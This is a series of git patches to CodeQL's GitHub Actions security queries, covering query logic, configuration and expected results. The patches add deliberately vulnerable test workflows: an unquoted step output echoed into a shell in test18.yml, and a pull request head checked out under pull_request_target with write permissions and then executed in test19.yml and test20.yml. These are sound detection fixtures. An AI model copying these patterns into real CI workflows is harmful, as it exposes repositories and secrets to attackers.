uses 'sonarsource/sonarcloud-github-action' with ref 'master', not a pinned commit hash | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Uses Step | +| .github/workflows/test18.yml:37:21:37:63 | sonarsource/sonarcloud-github-action@master | Unpinned 3rd party Action 'Sonar' step $@ uses 'sonarsource/sonarcloud-github-action' with ref 'master', not a pinned commit hash | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:13:10:22 | foo/bar@v1 | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 2380236acca9..baf354179b3e 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -262,6 +262,9 @@ edges | .github/workflows/test16.yml:270:9:273:6 | Run Step | .github/workflows/test16.yml:273:9:277:6 | Run Step: zips | | .github/workflows/test16.yml:273:9:277:6 | Run Step: zips | .github/workflows/test16.yml:277:9:281:6 | Run Step: tests | | .github/workflows/test16.yml:277:9:281:6 | Run Step: tests | .github/workflows/test16.yml:281:9:294:54 | Uses Step | +| .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:33:15:36:12 | Run Step | +| .github/workflows/test18.yml:33:15:36:12 | Run Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | @@ -325,6 +328,7 @@ edges | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | +| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test17.yml:3:5:3:16 | workflow_run | .github/workflows/test17.yml | | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | From 6dbbfa967277211aba958b5a261ff5c767dddeef Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 21 Oct 2024 12:12:37 +0200 Subject: [PATCH 603/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index e5471e236511..c908efa68f7e 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.69 +version: 0.1.70 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 660f3287090c..d2c2e26c361a 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.69 +version: 0.1.70 groups: [actions, queries] suites: codeql-suites extractor: javascript From 023e8cbe3e00a1207d641f8f8139e942275b585d Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Mon, 21 Oct 2024 20:59:42 -0400 Subject: [PATCH 604/707] factor semver to separate function --- .../actions/security/UseOfUnversionedImmutableAction.qll | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll index 2be71612f26e..3f65a2ffc72c 100644 --- a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll +++ b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll @@ -6,6 +6,11 @@ class UnversionedImmutableAction extends UsesStep { UnversionedImmutableAction() { immutableActionsDataModel(immutable_action) and this.getCallee() = immutable_action and - not this.getVersion().regexpMatch("^(v)?[0-9]+(\\.[0-9]+)*(\\.[xX])?$") + isNotSemVer(this.getVersion()) } } + +bindingset[version] +predicate isNotSemVer(string version) { + not version.regexpMatch("^(v)?[0-9]+(\\.[0-9]+)*(\\.[xX])?$") +} From da10ee74d353765cd60180afc8899ff7038614cb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 22 Oct 2024 11:18:42 +0200 Subject: [PATCH 605/707] Add workflow_dispatch and scheduled to the list of privileged and external (user interaction) events --- .../codeql/actions/dataflow/FlowSources.qll | 5 +- .../security/UntrustedCheckoutQuery.qll | 38 +++++-- ql/lib/ext/config/context_event_map.yml | 2 - .../config/externally_triggereable_events.yml | 3 +- .../ext/config/untrusted_event_properties.yml | 3 - .../CWE-829/UntrustedCheckoutCritical.ql | 6 +- .../CWE-078/CommandInjectionCritical.expected | 7 -- .../CWE-078/CommandInjectionMedium.expected | 9 -- .../CWE-094/.github/workflows/test18.yml | 33 ++++++ .../CWE-094/CodeInjectionCritical.expected | 4 + .../CWE-094/CodeInjectionMedium.expected | 3 + .../CWE-829/.github/workflows/test19.yml | 22 ++++ .../CWE-829/.github/workflows/test20.yml | 22 ++++ .../.github/workflows/untrusted_checkout.yml | 18 +++- .../.github/workflows/untrusted_checkout4.yml | 49 --------- .../UntrustedCheckoutCritical.expected | 102 +++++++++--------- .../CWE-829/UntrustedCheckoutHigh.expected | 4 + .../CWE-829/UntrustedCheckoutMedium.expected | 4 - 18 files changed, 195 insertions(+), 139 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index b79a86ce27ac..91b110f87eee 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -40,9 +40,10 @@ class GitHubCtxSource extends RemoteFlowSource { class GitHubEventCtxSource extends RemoteFlowSource { string flag; + string context; GitHubEventCtxSource() { - exists(Expression e, string context, string regexp | + exists(Expression e, string regexp | this.asExpr() = e and context = e.getExpression() and ( @@ -62,6 +63,8 @@ class GitHubEventCtxSource extends RemoteFlowSource { } override string getSourceType() { result = flag } + + string getContext() { result = context } } abstract class CommandSource extends RemoteFlowSource { diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index c9a78f6d0b6b..336afdc73b15 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -197,9 +197,23 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt ActionsMutableRefCheckout() { this.getCallee() = "actions/checkout" and ( - exists(ActionsMutableRefCheckoutFlow::PathNode sink | - ActionsMutableRefCheckoutFlow::flowPath(_, sink) and - sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) + exists( + ActionsMutableRefCheckoutFlow::PathNode source, ActionsMutableRefCheckoutFlow::PathNode sink + | + ActionsMutableRefCheckoutFlow::flowPath(source, sink) and + sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) and + ( + not source.getNode() instanceof GitHubEventCtxSource + or + source.getNode() instanceof GitHubEventCtxSource and + // the context is available for the job trigger events + exists(string context, string context_prefix | + contextTriggerDataModel(this.getEnclosingWorkflow().getATriggerEvent().getName(), + context_prefix) and + context = source.getNode().(GitHubEventCtxSource).getContext() and + normalizeExpr(context).matches("%" + context_prefix + "%") + ) + ) ) or // heuristic base on the step id and field name @@ -241,9 +255,21 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ActionsSHACheckout() { this.getCallee() = "actions/checkout" and ( - exists(ActionsSHACheckoutFlow::PathNode sink | - ActionsSHACheckoutFlow::flowPath(_, sink) and - sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) + exists(ActionsSHACheckoutFlow::PathNode source, ActionsSHACheckoutFlow::PathNode sink | + ActionsSHACheckoutFlow::flowPath(source, sink) and + sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) and + ( + not source.getNode() instanceof GitHubEventCtxSource + or + source.getNode() instanceof GitHubEventCtxSource and + // the context is available for the job trigger events + exists(string context, string context_prefix | + contextTriggerDataModel(this.getEnclosingWorkflow().getATriggerEvent().getName(), + context_prefix) and + context = source.getNode().(GitHubEventCtxSource).getContext() and + normalizeExpr(context).matches("%" + context_prefix + "%") + ) + ) ) or // heuristic base on the step id and field name diff --git a/ql/lib/ext/config/context_event_map.yml b/ql/lib/ext/config/context_event_map.yml index 4c2451b5ab85..a5e8ced2e9ed 100644 --- a/ql/lib/ext/config/context_event_map.yml +++ b/ql/lib/ext/config/context_event_map.yml @@ -40,8 +40,6 @@ extensions: - ["push", "github.event.commits"] - ["push", "github.event.head_commit"] - ["push", "github.event.changes"] - - ["repository_dispatch", "github.event.client_payload"] - - ["workflow_dispatch", "github.event.inputs"] - ["workflow_run", "github.event.workflow"] - ["workflow_run", "github.event.workflow_run"] - ["workflow_run", "github.event.changes"] diff --git a/ql/lib/ext/config/externally_triggereable_events.yml b/ql/lib/ext/config/externally_triggereable_events.yml index 028671c243dd..c3481c1cca5c 100644 --- a/ql/lib/ext/config/externally_triggereable_events.yml +++ b/ql/lib/ext/config/externally_triggereable_events.yml @@ -16,4 +16,5 @@ extensions: - ["pull_request_target"] - ["workflow_run"] # depending on branch filter - ["workflow_call"] # depending on caller - + - ["workflow_dispatch"] + - ["scheduled"] diff --git a/ql/lib/ext/config/untrusted_event_properties.yml b/ql/lib/ext/config/untrusted_event_properties.yml index be2e1c9c7981..1e54fa6eca3f 100644 --- a/ql/lib/ext/config/untrusted_event_properties.yml +++ b/ql/lib/ext/config/untrusted_event_properties.yml @@ -24,8 +24,6 @@ extensions: - ["github\\.event\\.workflow_run\\.head_commit\\.message", "text"] - ["github\\.event\\.pull_request\\.head\\.repo\\.description", "text"] - ["github\\.event\\.workflow_run\\.head_repository\\.description", "text"] - - ["github\\.event\\.client_payload\\[[0-9]+\\]", "text"] - - ["github\\.event\\.client_payload", "text"] - ["github\\.event\\.changes\\.body\\.from", "title"] # BRANCH - ["github\\.event\\.pull_request\\.head\\.repo\\.default_branch", "branch"] @@ -59,7 +57,6 @@ extensions: # JSON - ["github", "json"] - ["github\\.event", "json"] - - ["github\\.event\\.client_payload", "json"] - ["github\\.event\\.comment", "json"] - ["github\\.event\\.commits", "json"] - ["github\\.event\\.discussion", "json"] diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 4b87ad00c0f4..84d85a998017 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -47,6 +47,8 @@ where ) and // the checkout occurs in a privileged context inPrivilegedContext(poisonable, event) and + not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) and not exists(ControlCheck check | check.protects(poisonable, event, "untrusted-checkout")) -select poisonable, checkout, poisonable, "Execution of untrusted code on a privileged workflow. $@", - event, event.getLocation().getFile().toString() +select poisonable, checkout, poisonable, + "Execution of untrusted code on a privileged workflow ($@)", event, + event.getLocation().getFile().toString() diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected index b66822accab3..decabad082fb 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected @@ -1,13 +1,6 @@ edges -| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | provenance | | -| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | -| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | nodes -| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | semmle.label | input subcommand | -| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | semmle.label | inputs.subcommand | | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | -| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | subpaths #select | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected index 393dde04f356..99ebb1edc05d 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected @@ -1,14 +1,5 @@ edges -| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | provenance | | -| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | -| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | nodes -| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | semmle.label | input subcommand | -| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | semmle.label | inputs.subcommand | | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | -| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | subpaths #select -| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | Potential command injection in $@, which may be controlled by an external user. | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | ${{ inputs.subcommand }} | -| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | Potential command injection in $@, which may be controlled by an external user. | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | ${{ inputs.subcommand }} | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml new file mode 100644 index 000000000000..552ad866b5ae --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml @@ -0,0 +1,33 @@ +on: + workflow_dispatch: + +jobs: + fetch-issues: + runs-on: ubuntu-latest + steps: + - name: Fetch open issues + id: issues + uses: octokit/request-action@v2.x + with: + route: GET /repos/foo/bar/issues?state=open + env: + GITHUB_TOKEN: ${{ secrets.GITHUBACTIONS_TOKEN }} + + - name: Write issues to file + run: | + echo '${{ steps.issues.outputs.data }}' > issues.json + + - name: Setup Node.js + uses: actions/setup-node@v2 + with: + node-version: '14' + + - name: Print issue URLs + run: | + const fs = require('fs'); + const issues = JSON.parse(fs.readFileSync('issues.json', 'utf8')); + const filteredIssues = issues.filter(issue => issue.body.includes('Is your portal managed or self-hosted?\r\n\r\nManaged')); + for (const issue of filteredIssues) { + console.log(issue.html_url); + } + shell: bash diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 1ad0d4987917..83faf4eb5e44 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -159,6 +159,7 @@ edges | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | provenance | | | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -484,6 +485,8 @@ nodes | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | semmle.label | Uses Step: get-pull-request | | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -639,6 +642,7 @@ subpaths | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index eb852fdd4d29..15d526ca7b4d 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -159,6 +159,7 @@ edges | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | provenance | | | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -484,6 +485,8 @@ nodes | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | semmle.label | Uses Step: get-pull-request | | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml new file mode 100644 index 000000000000..c4f90b97d05b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml @@ -0,0 +1,22 @@ +on: + pull_request_target: + types: [ opened, synchronize ] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + + runs-on: ubuntu-latest + env: + GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}" + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v4 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.ref }} + - run: | + ./cmd diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml new file mode 100644 index 000000000000..942b17967d32 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml @@ -0,0 +1,22 @@ +on: + pull_request_target: + types: [ opened, synchronize ] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + + runs-on: ubuntu-latest + env: + GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}" + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v4 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.sha }} + - run: | + ./cmd diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml index 1160497a4a38..15d4813c40e9 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml @@ -1,15 +1,25 @@ on: - pull_request_target + pull_request_target: jobs: - build: + test1: runs-on: ubuntu-latest - env: - HEAD: ${{ github.event.pull_request.head.sha }} steps: - uses: actions/checkout@v2 with: ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + test2: + runs-on: ubuntu-latest + env: + HEAD: ${{ github.event.pull_request.head.sha }} + steps: - uses: actions/checkout@v2 with: ref: ${{ env.HEAD }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml index 5494d97797e2..7e154502c139 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml @@ -1,34 +1,8 @@ -name: Auto Bump Versions - on: issue_comment: types: [created, edited] jobs: - add-same-version-label-to-pr: - runs-on: ubuntu-latest - if: github.event.issue.pull_request && contains(github.event.comment.body, '/add-same-version-label') - steps: - - uses: actions/checkout@v3 - - name: Add same version label - uses: actions/github-script@v6 - if: success() - with: - github-token: ${{secrets.GITHUB_TOKEN}} - script: | - github.rest.issues.addLabels({ - issue_number: context.issue.number, - owner: context.repo.owner, - repo: context.repo.repo, - labels: ['same version'] - }) - 